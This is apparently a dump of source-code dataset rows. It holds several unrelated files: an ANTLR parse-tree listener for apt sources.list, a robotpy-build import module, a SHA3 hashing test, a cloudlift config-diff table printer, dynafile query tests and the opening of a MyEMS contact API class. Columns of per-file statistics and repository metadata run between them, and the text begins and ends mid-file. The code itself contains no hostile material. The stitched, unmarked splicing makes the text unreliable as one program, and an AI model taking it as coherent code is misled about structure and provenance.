'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
| 31.068182
| 94
| 0.572578
| 956
| 9,569
| 5.466527
| 0.15272
| 0.059701
| 0.024493
| 0.029085
| 0.898584
| 0.860122
| 0.850938
| 0.850938
| 0.823
| 0.795446
| 0
| 0.023317
| 0.327725
| 9,569
| 307
| 95
| 31.169381
| 0.789056
| 0.070227
| 0
| 0.826255
| 0
| 0
| 0.309535
| 0.016493
| 0
| 0
| 0
| 0
| 0.030888
| 1
| 0.023166
| false
| 0
| 0.023166
| 0
| 0.046332
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
607fc8491f82461b6a8ae4b4d10db330f9fe08b9
| 9,903
|
py
|
Python
|
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | 1
|
2020-08-15T02:18:25.000Z
|
2020-08-15T02:18:25.000Z
|
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | null | null | null |
AptSourcesList/parserBundle/compiled/antlr4/apt_sourceListener.py
|
KOLANICH/AptSourcesList
|
8e874fbbd6f68492ee760e8f02ec76b461db8512
|
[
"Unlicense"
] | null | null | null |
# Generated from grammar.g4 by ANTLR 4.8
from antlr4 import *
if __name__ is not None and "." in __name__:
from .apt_sourceParser import apt_sourceParser
else:
from apt_sourceParser import apt_sourceParser
# This class defines a complete listener for a parse tree produced by apt_sourceParser.
class apt_sourceListener(ParseTreeListener):
# Enter a parse tree produced by apt_sourceParser#record.
def enterRecord(self, ctx:apt_sourceParser.RecordContext):
pass
# Exit a parse tree produced by apt_sourceParser#record.
def exitRecord(self, ctx:apt_sourceParser.RecordContext):
pass
# Enter a parse tree produced by apt_sourceParser#component.
def enterComponent(self, ctx:apt_sourceParser.ComponentContext):
pass
# Exit a parse tree produced by apt_sourceParser#component.
def exitComponent(self, ctx:apt_sourceParser.ComponentContext):
pass
# Enter a parse tree produced by apt_sourceParser#componentsR.
def enterComponentsR(self, ctx:apt_sourceParser.ComponentsRContext):
pass
# Exit a parse tree produced by apt_sourceParser#componentsR.
def exitComponentsR(self, ctx:apt_sourceParser.ComponentsRContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsOpt.
def enterOptionsOpt(self, ctx:apt_sourceParser.OptionsOptContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsOpt.
def exitOptionsOpt(self, ctx:apt_sourceParser.OptionsOptContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsR.
def enterOptionsR(self, ctx:apt_sourceParser.OptionsRContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsR.
def exitOptionsR(self, ctx:apt_sourceParser.OptionsRContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionsList.
def enterOptionsList(self, ctx:apt_sourceParser.OptionsListContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionsList.
def exitOptionsList(self, ctx:apt_sourceParser.OptionsListContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionR.
def enterOptionR(self, ctx:apt_sourceParser.OptionRContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionR.
def exitOptionR(self, ctx:apt_sourceParser.OptionRContext):
pass
# Enter a parse tree produced by apt_sourceParser#commenterROpt.
def enterCommenterROpt(self, ctx:apt_sourceParser.CommenterROptContext):
pass
# Exit a parse tree produced by apt_sourceParser#commenterROpt.
def exitCommenterROpt(self, ctx:apt_sourceParser.CommenterROptContext):
pass
# Enter a parse tree produced by apt_sourceParser#tickEnclosedString.
def enterTickEnclosedString(self, ctx:apt_sourceParser.TickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#tickEnclosedString.
def exitTickEnclosedString(self, ctx:apt_sourceParser.TickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_words_with_delF.
def enterRest_words_with_delF(self, ctx:apt_sourceParser.Rest_words_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_words_with_delF.
def exitRest_words_with_delF(self, ctx:apt_sourceParser.Rest_words_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_word_with_delF.
def enterRest_word_with_delF(self, ctx:apt_sourceParser.Rest_word_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_word_with_delF.
def exitRest_word_with_delF(self, ctx:apt_sourceParser.Rest_word_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_options_with_delF.
def enterRest_options_with_delF(self, ctx:apt_sourceParser.Rest_options_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_options_with_delF.
def exitRest_options_with_delF(self, ctx:apt_sourceParser.Rest_options_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#rest_option_with_delF.
def enterRest_option_with_delF(self, ctx:apt_sourceParser.Rest_option_with_delFContext):
pass
# Exit a parse tree produced by apt_sourceParser#rest_option_with_delF.
def exitRest_option_with_delF(self, ctx:apt_sourceParser.Rest_option_with_delFContext):
pass
# Enter a parse tree produced by apt_sourceParser#commenterR.
def enterCommenterR(self, ctx:apt_sourceParser.CommenterRContext):
pass
# Exit a parse tree produced by apt_sourceParser#commenterR.
def exitCommenterR(self, ctx:apt_sourceParser.CommenterRContext):
pass
# Enter a parse tree produced by apt_sourceParser#singleTickEnclosedString.
def enterSingleTickEnclosedString(self, ctx:apt_sourceParser.SingleTickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#singleTickEnclosedString.
def exitSingleTickEnclosedString(self, ctx:apt_sourceParser.SingleTickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#doubleTickEnclosedString.
def enterDoubleTickEnclosedString(self, ctx:apt_sourceParser.DoubleTickEnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#doubleTickEnclosedString.
def exitDoubleTickEnclosedString(self, ctx:apt_sourceParser.DoubleTickEnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#enclosedString.
def enterEnclosedString(self, ctx:apt_sourceParser.EnclosedStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#enclosedString.
def exitEnclosedString(self, ctx:apt_sourceParser.EnclosedStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#cdromURI.
def enterCdromURI(self, ctx:apt_sourceParser.CdromURIContext):
pass
# Exit a parse tree produced by apt_sourceParser#cdromURI.
def exitCdromURI(self, ctx:apt_sourceParser.CdromURIContext):
pass
# Enter a parse tree produced by apt_sourceParser#wordWithDashSegment.
def enterWordWithDashSegment(self, ctx:apt_sourceParser.WordWithDashSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#wordWithDashSegment.
def exitWordWithDashSegment(self, ctx:apt_sourceParser.WordWithDashSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#wordWithDash.
def enterWordWithDash(self, ctx:apt_sourceParser.WordWithDashContext):
pass
# Exit a parse tree produced by apt_sourceParser#wordWithDash.
def exitWordWithDash(self, ctx:apt_sourceParser.WordWithDashContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSquareBracketStringSegment.
def enterNonSquareBracketStringSegment(self, ctx:apt_sourceParser.NonSquareBracketStringSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSquareBracketStringSegment.
def exitNonSquareBracketStringSegment(self, ctx:apt_sourceParser.NonSquareBracketStringSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSquareBracketString.
def enterNonSquareBracketString(self, ctx:apt_sourceParser.NonSquareBracketStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSquareBracketString.
def exitNonSquareBracketString(self, ctx:apt_sourceParser.NonSquareBracketStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSpaceStringSegment.
def enterNonSpaceStringSegment(self, ctx:apt_sourceParser.NonSpaceStringSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSpaceStringSegment.
def exitNonSpaceStringSegment(self, ctx:apt_sourceParser.NonSpaceStringSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#nonSpaceString.
def enterNonSpaceString(self, ctx:apt_sourceParser.NonSpaceStringContext):
pass
# Exit a parse tree produced by apt_sourceParser#nonSpaceString.
def exitNonSpaceString(self, ctx:apt_sourceParser.NonSpaceStringContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionValueSegment.
def enterOptionValueSegment(self, ctx:apt_sourceParser.OptionValueSegmentContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionValueSegment.
def exitOptionValueSegment(self, ctx:apt_sourceParser.OptionValueSegmentContext):
pass
# Enter a parse tree produced by apt_sourceParser#optionValue.
def enterOptionValue(self, ctx:apt_sourceParser.OptionValueContext):
pass
# Exit a parse tree produced by apt_sourceParser#optionValue.
def exitOptionValue(self, ctx:apt_sourceParser.OptionValueContext):
pass
# Enter a parse tree produced by apt_sourceParser#uriSchema.
def enterUriSchema(self, ctx:apt_sourceParser.UriSchemaContext):
pass
# Exit a parse tree produced by apt_sourceParser#uriSchema.
def exitUriSchema(self, ctx:apt_sourceParser.UriSchemaContext):
pass
# Enter a parse tree produced by apt_sourceParser#genericURI.
def enterGenericURI(self, ctx:apt_sourceParser.GenericURIContext):
pass
# Exit a parse tree produced by apt_sourceParser#genericURI.
def exitGenericURI(self, ctx:apt_sourceParser.GenericURIContext):
pass
# Enter a parse tree produced by apt_sourceParser#uriR.
def enterUriR(self, ctx:apt_sourceParser.UriRContext):
pass
# Exit a parse tree produced by apt_sourceParser#uriR.
def exitUriR(self, ctx:apt_sourceParser.UriRContext):
pass
del apt_sourceParser
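# Driving sketch, not part of the generated file and best kept in a separate
# script: walk a parse tree with the listener above. The apt_sourceLexer
# module name and the 'record' start rule are assumptions based on the usual
# ANTLR naming and the contexts defined above.
from antlr4 import InputStream, CommonTokenStream, ParseTreeWalker
from apt_sourceLexer import apt_sourceLexer
from apt_sourceParser import apt_sourceParser
from apt_sourceListener import apt_sourceListener

class RecordPrinter(apt_sourceListener):
    # Override only the hook we need; every other method stays a no-op.
    def enterRecord(self, ctx: apt_sourceParser.RecordContext):
        print("record:", ctx.getText())

stream = InputStream("deb http://deb.debian.org/debian stable main\n")
parser = apt_sourceParser(CommonTokenStream(apt_sourceLexer(stream)))
ParseTreeWalker().walk(RecordPrinter(), parser.record())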
| 36.274725
| 108
| 0.767242
| 1,111
| 9,903
| 6.656166
| 0.134113
| 0.247465
| 0.079784
| 0.143611
| 0.845166
| 0.845166
| 0.545233
| 0.5405
| 0.539824
| 0.140095
| 0
| 0.000492
| 0.178532
| 9,903
| 273
| 109
| 36.274725
| 0.908543
| 0.382207
| 0
| 0.471545
| 1
| 0
| 0.000167
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.471545
| false
| 0.471545
| 0.02439
| 0
| 0.504065
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
609d741a0b7771fcbfb65c10dba1eb353899a7f5
| 3,206
|
py
|
Python
|
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/cpp/rpytest/ft/__init__.py
|
ConnectionMaster/robotpy-build
|
9571a84fdd6268be5e945b31ea8929d84355071a
|
[
"BSD-3-Clause"
] | null | null | null |
from . import _init_rpytest_ft
# autogenerated by 'robotpy-build create-imports rpytest.ft rpytest.ft._rpytest_ft'
from ._rpytest_ft import (
Abstract,
ClassWithFields,
ClassWithIgnored,
ClassWithTrampoline,
DocAppendClass,
DocAppendEnum,
DocClass,
DocEnum,
DocTemplateAppend,
DocTemplateSet,
EnumContainer,
EnumWithIgnored,
GCEnum,
GEnum,
IBase,
IChild,
IFinal,
IGrandChild,
IMChild,
IMOther,
LTTester,
LTWithVirtual,
MVB,
MVC,
MVD0,
MVD1,
MVE,
MVF,
NSEnumContainer,
NSGCEnum,
NSGEnum,
NestedTypecaster,
Nurse,
OB,
OBInitializer,
OBinitOB,
OC,
OCInitializer,
OCinitOB,
OCinitOC,
OG,
OGinitOC,
OverloadedObject,
PBase,
PChild,
PGChild,
PatientRef,
RenamedClass,
RenamedEnum,
StaticOnly,
StripPrefixEnum,
TBase,
TBaseGetN4,
TBaseGetN6,
TBasicString,
TChildGetN4,
TChildGetN6,
TClassWithFn,
TConcrete,
TDependentParamInt,
TDependentUsingInt,
TOuter,
TcrtpConcrete,
TcrtpFwdConcrete,
VBase,
VChild,
VirtualComma,
checkConvertRpyintToInt,
check_impure_io,
check_pure_io,
convertRpyintToInt,
fnEmptyDefaultParam,
fnIgnoredParam,
fnOverload,
fnParamArrayOut,
fnParamArrayOutWithDefault,
fnParamFundConstRef,
fnParamFundPtr,
fnParamFundRef,
fnRenamed,
fnRenamedParam,
fnSimpleDefaultParam,
get123,
raise_from,
raise_from_already_set,
subpkg,
)
__all__ = [
"Abstract",
"ClassWithFields",
"ClassWithIgnored",
"ClassWithTrampoline",
"DocAppendClass",
"DocAppendEnum",
"DocClass",
"DocEnum",
"DocTemplateAppend",
"DocTemplateSet",
"EnumContainer",
"EnumWithIgnored",
"GCEnum",
"GEnum",
"IBase",
"IChild",
"IFinal",
"IGrandChild",
"IMChild",
"IMOther",
"LTTester",
"LTWithVirtual",
"MVB",
"MVC",
"MVD0",
"MVD1",
"MVE",
"MVF",
"NSEnumContainer",
"NSGCEnum",
"NSGEnum",
"NestedTypecaster",
"Nurse",
"OB",
"OBInitializer",
"OBinitOB",
"OC",
"OCInitializer",
"OCinitOB",
"OCinitOC",
"OG",
"OGinitOC",
"OverloadedObject",
"PBase",
"PChild",
"PGChild",
"PatientRef",
"RenamedClass",
"RenamedEnum",
"StaticOnly",
"StripPrefixEnum",
"TBase",
"TBaseGetN4",
"TBaseGetN6",
"TBasicString",
"TChildGetN4",
"TChildGetN6",
"TClassWithFn",
"TConcrete",
"TDependentParamInt",
"TDependentUsingInt",
"TOuter",
"TcrtpConcrete",
"TcrtpFwdConcrete",
"VBase",
"VChild",
"VirtualComma",
"checkConvertRpyintToInt",
"check_impure_io",
"check_pure_io",
"convertRpyintToInt",
"fnEmptyDefaultParam",
"fnIgnoredParam",
"fnOverload",
"fnParamArrayOut",
"fnParamArrayOutWithDefault",
"fnParamFundConstRef",
"fnParamFundPtr",
"fnParamFundRef",
"fnRenamed",
"fnRenamedParam",
"fnSimpleDefaultParam",
"get123",
"raise_from",
"raise_from_already_set",
"subpkg",
]
| 17.712707
| 83
| 0.612913
| 210
| 3,206
| 9.228571
| 0.480952
| 0.02322
| 0.016512
| 0.018576
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0.942208
| 0
| 0.007745
| 0.275109
| 3,206
| 180
| 84
| 17.811111
| 0.826162
| 0.025265
| 0
| 0
| 1
| 0
| 0.294909
| 0.022735
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011299
| 0
| 0.011299
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60c8d5d5fdd9e3d1516ddfc5a278883e436b21ee
| 420
|
py
|
Python
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 2
|
2017-09-14T08:07:55.000Z
|
2021-05-18T05:05:05.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 111
|
2018-04-15T14:32:14.000Z
|
2021-03-28T21:06:29.000Z
|
Platforms/Web/Processing/Api/Discord/Configs/Blacklistedwords/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 1
|
2018-04-15T13:24:44.000Z
|
2018-04-15T13:24:44.000Z
|
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.create as create
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.delete as delete
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.errors as errors
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.get as get
import Platforms.Web.Processing.Api.Discord.Configs.Blacklistedwords.main as main
| 70
| 85
| 0.869048
| 55
| 420
| 6.636364
| 0.254545
| 0.205479
| 0.246575
| 0.383562
| 0.835616
| 0.835616
| 0.835616
| 0.835616
| 0
| 0
| 0
| 0
| 0.047619
| 420
| 5
| 86
| 84
| 0.9125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
60da9e5bfc14533e861ce7f9018860f57d0a094b
| 2,645
|
py
|
Python
|
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
Draft_Phuong/hash/test_hash.py
|
phuong27102000/NTRU_HRSS_KEM_SV
|
fe4fd095134a41f4131a3aa953197e3933b303ad
|
[
"MIT"
] | null | null | null |
import hashes
import pack
import check
import bit_handle
seed = []
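# test input: one long literal bit string (reversed below before packing)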
message = "1101001010110001110100000010111001010010101001101000110101000110100110111101001111001000011010101001000110000011110000101000000010011000100101001000011000111011001010101010000011011110110100101100111110001100101100101001111101001111101100101111111010011011001000111100000100001001000010001110001010110001010101101101011011011010110101010101110000101111001011011010001000010010110111101000111100001010000000010101010101111011001101000101011101010110010011010011111011101110000101010010100111011100000010000011001101101001010110000010100010000100101001111001000000101000011100010100001100110101101010101100110100000011101100010100100000100100010111110100100000101110010001111000111010010011101110110001111101001001011010110000101111100010001010100111011000010111000010010011111001101101101101110111100010100000101011001000111010110010110011101010101010110110100111101111101000110000101000101111010101011101011111110111100000000011010100001010110101011010100000101001000110100100110001110100010010001001010110100001110101000010111100001110110010101001110101010110101001100101001001111000011011011100000000100101001110111101010010001011001010100101011100111000000000100101011001100000010000001100010011000111110011010001100101100111110110010101011101111011101100101010110011110010011111001001010000001110101001110010010111111010001111010100001101111100101011111100000011010000011000000000000011001101100101010010111101110010001110001001010010101111001111100101011001001100011111001001110000111000111100001100111011000111001101110100101000110000110111010011100111110001100111000011101011010101100001101000100101000100000111000010010100101010010111011100100111100010111001000000111000000010111011010110000111011100000100101010001000100110001001011000110111000000101101111110110101110011010010111011000110101100101110001100111110010001100010110010110011101110010101000011010111110001000010101110111011010101011011110110010010100000110011000010100110100011001100001001101101100110010011011110111110111010100100111111011000001100100010000010101101110000101101111001001100110110011001110000010111011100011110101010101110011010100010001100100100111100000010011101000000100110011010001110011100101000010001001010110111010100100000100101001010011011111"
message = message[::-1]
bit_map = {'1': 1, '0': 0}  # character -> integer bit
for char in message:
    seed.append(bit_map[char])
print(check.show(pack.bi2by(seed)))
s = seed.copy()
s.reverse()
s2 = int.from_bytes(bit_handle.arr_to_str(s)[::-1],"big")
print("Day la: %X" %s2)
ciph = hashes.sha3_256(seed)
print(check.show(pack.bi2by(ciph)))
| 139.210526
| 2,252
| 0.944045
| 67
| 2,645
| 37.179104
| 0.537313
| 0.007226
| 0.01124
| 0.014452
| 0.018466
| 0
| 0
| 0
| 0
| 0
| 0
| 0.874612
| 0.026087
| 2,645
| 18
| 2,253
| 146.944444
| 0.092391
| 0
| 0
| 0
| 0
| 0
| 0.858013
| 0.852303
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.235294
| 0
| 0.235294
| 0.176471
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
60dddc606815e2617018487cf1a7cba8a52a37f9
| 2,222
|
py
|
Python
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 19
|
2019-03-04T08:38:18.000Z
|
2022-03-25T04:48:38.000Z
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 28
|
2020-01-19T07:16:02.000Z
|
2022-02-24T06:58:27.000Z
|
cloudlift/config/diff.py
|
sannithibalaji/cloudlift
|
656e152adff353fcb45c800d464a4ed945b7b34f
|
[
"MIT"
] | 10
|
2019-07-29T12:21:03.000Z
|
2021-11-17T15:52:54.000Z
|
from terminaltables import SingleTable
from cloudlift.config.logging import log_bold
def print_parameter_changes(differences):
changes_to_show = [["Type", "Config", "Old val", "New val"]]
for difference in differences:
if difference[0] == 'change':
changes_to_show.append([
'change',
difference[1],
difference[2][0],
difference[2][1]]
)
if difference[0] == 'add':
difference[2].sort(key=lambda x: x[0])
for added_item in difference[2]:
changes_to_show.append([
'add',
added_item[0],
'',
added_item[1]])
if difference[0] == 'remove':
difference[2].sort(key=lambda x: x[0])
for removed_item in difference[2]:
changes_to_show.append(['remove', removed_item[0],
removed_item[1], ''])
log_bold("Modifications to config:")
print(SingleTable(changes_to_show).table)
def print_json_changes(differences):
changes_to_show = [["Type", "Config", "Old val", "New val"]]
for difference in differences:
if difference[0] == 'change':
changes_to_show.append([
'change',
difference[1],
difference[2][0],
difference[2][1]
])
if difference[0] == 'add':
difference[2].sort(key=lambda x: x[0])
for added_item in difference[2]:
changes_to_show.append([
'add',
difference[1],
'',
str(added_item[0])+" : "+str(added_item[1])
])
if difference[0] == 'remove':
difference[2].sort(key=lambda x: x[0])
for removed_item in difference[2]:
changes_to_show.append([
'remove',
str(difference[1])+"."+str(removed_item[0]),
removed_item[1],
''
])
log_bold("Modifications to config:")
print(SingleTable(changes_to_show).table)
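# Usage sketch, not from this module: the difference tuples follow the
# ('change' | 'add' | 'remove', key, payload) shape consumed above, e.g. as
# produced by dictdiffer.diff() (dictdiffer itself is an assumption).
from cloudlift.config.diff import print_parameter_changes

differences = [
    ('change', 'PORT', ('80', '8080')),
    ('add', '', [('LOG_LEVEL', 'info')]),
    ('remove', '', [('DEBUG', 'true')]),
]
print_parameter_changes(differences)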
| 35.269841
| 66
| 0.486049
| 227
| 2,222
| 4.585903
| 0.185022
| 0.126801
| 0.12488
| 0.10951
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0.849183
| 0
| 0.027982
| 0.388839
| 2,222
| 62
| 67
| 35.83871
| 0.738586
| 0
| 0
| 0.719298
| 0
| 0
| 0.072007
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.035088
| 0
| 0.070175
| 0.070175
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8803935f8970a7c24771e264a79f3ffa6a64ffe4
| 2,716
|
py
|
Python
|
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_query.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
from dynafile import Dynafile
def test_query_forward(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
items = list(db.query(pk="1", starts_with="ab"))
assert items == [ab, ac]
def test_query_backwords(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
items = list(db.query(pk="1", starts_with="ab", scan_index_forward=False))
assert items == [ab, aa]
def test_query_with_callable_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
ba = {
"PK": "1",
"SK": "ba",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = list(db.query(pk="1", _filter=lambda i: i["SK"].startswith("a")))
assert items == [aa, ab, ac]
def test_query_with_string_filter(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"name": "Dynafile",
}
ab = {
"PK": "1",
"SK": "ab",
"name": "Dynafile",
}
ac = {
"PK": "1",
"SK": "ac",
"name": "Dynafile",
}
ba = {
"PK": "1",
"SK": "ba",
"name": "Dynafile",
}
db.put_item(item=aa)
db.put_item(item=ab)
db.put_item(item=ac)
db.put_item(item=ba)
items = list(db.query(pk="1", _filter="SK =~ /^a/"))
assert items == [aa, ab, ac]
def test_query_with_string_filter_nested(tmp_path):
db = Dynafile(tmp_path / "db")
aa = {
"PK": "1",
"SK": "aa",
"data": {
"count": 0
},
}
ab = {
"PK": "1",
"SK": "ab",
"data": {
"count": 1
},
}
db.put_item(item=aa)
db.put_item(item=ab)
items = list(db.query(pk="1", _filter="data.count > 0"))
assert items == [ab]
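# Condensed usage sketch of the query contract the tests above pin down;
# only tempfile/pathlib are additions, everything else reuses the tested API.
import tempfile
from pathlib import Path
from dynafile import Dynafile

with tempfile.TemporaryDirectory() as tmp:
    db = Dynafile(Path(tmp) / "db")
    for sk in ("aa", "ab", "ba"):
        db.put_item(item={"PK": "1", "SK": sk})
    print(list(db.query(pk="1", starts_with="ab")))      # forward range scan
    print(list(db.query(pk="1", _filter="SK =~ /^a/")))  # string filter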
| 18.106667
| 78
| 0.434094
| 335
| 2,716
| 3.370149
| 0.119403
| 0.055802
| 0.070859
| 0.184234
| 0.826395
| 0.804252
| 0.804252
| 0.782108
| 0.782108
| 0.782108
| 0
| 0.013809
| 0.360088
| 2,716
| 150
| 79
| 18.106667
| 0.635788
| 0
| 0
| 0.719008
| 0
| 0
| 0.12661
| 0
| 0
| 0
| 0
| 0
| 0.041322
| 1
| 0.041322
| false
| 0
| 0.008264
| 0
| 0.049587
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7166f0c505205324a42a55080e1c8d4ba01546c8
| 12,302
|
py
|
Python
|
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | null | null | null |
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | null | null | null |
myems-api/core/contact.py
|
RichardZhong/myems-carbon
|
fec34f938a7c8e0166544704eb8467a41d6b034f
|
[
"MIT"
] | 1
|
2022-01-29T14:22:17.000Z
|
2022-01-29T14:22:17.000Z
|
import falcon
import simplejson as json
import mysql.connector
import config
import uuid
import re
class ContactCollection:
@staticmethod
def __init__():
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp):
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
